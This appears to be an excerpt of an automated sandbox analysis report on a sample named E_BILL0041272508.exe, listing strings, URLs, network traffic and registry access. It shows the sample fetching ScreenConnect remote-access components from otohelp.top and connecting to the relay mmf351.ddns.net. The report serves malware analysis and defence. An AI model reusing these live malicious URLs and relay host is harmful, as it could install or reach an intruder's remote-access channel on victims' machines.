                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCC067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCC067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0pI
                  Source: svchost.exe, 00000004.00000002.3767047379.0000027458200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000002.00000002.4003310166.0000023CE60F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCBFF0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000002.00000002.4003051515.0000023CE609F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCC0A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.dign
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.2443372592.00000000020BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/2
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC554000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC569000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC5CF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                  Source: svchost.exe, 00000004.00000003.2142326938.0000027458100000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Clie
                  Source: dfsvc.exe, 00000002.00000002.4003051515.0000023CE60C6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385887426.000000001AE30000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2383915676.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, AYPVIQNL.log.2.drString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                  Source: dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application$E
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application.tio&
                  Source: dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application0
                  Source: E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application?e=
                  Source: AYPVIQNL.log.2.drString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&
                  Source: dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationTz
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE618E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationc
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationml%%
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp, AYPVIQNL.log.2.drString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifestllT
                  Source: dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifestq
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientSe
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC327000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Wind
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Windows.dllR
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstage
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configZaB_
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeLMEMH
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeU
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsC
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.ex
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exedl
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManag
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.e
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe0
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe9
                  Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://otohelp.top/Bin/ScreenConnect.x
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 79.110.49.16:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
